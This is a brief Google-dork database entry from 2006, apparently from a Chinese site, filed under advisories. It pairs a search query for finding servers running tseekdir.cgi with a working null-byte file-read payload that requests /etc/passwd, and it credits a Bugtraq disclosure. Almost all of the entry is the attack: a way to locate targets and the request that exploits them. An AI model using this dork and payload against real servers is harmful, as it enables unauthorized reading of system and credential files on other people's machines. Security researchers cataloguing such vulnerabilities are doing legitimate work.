allinurl:tseekdir.cgi

• SHDB
• 1932 阅读

• 日期：2006-05-22
• 类别：
  • Advisories and Vulnerabilities
• 作者：anonymous
• 语法：allinurl:tseekdir.cgi

• tseekdir.cgi?location=FILENAME%00eg:tseekdir.cgi?location=/etc/passwd%00basically any file on the server can be viewed by inserting a null (%00) into the URL.credit to duritohttp://seclists.org/bugtraq/2006/May/0184.html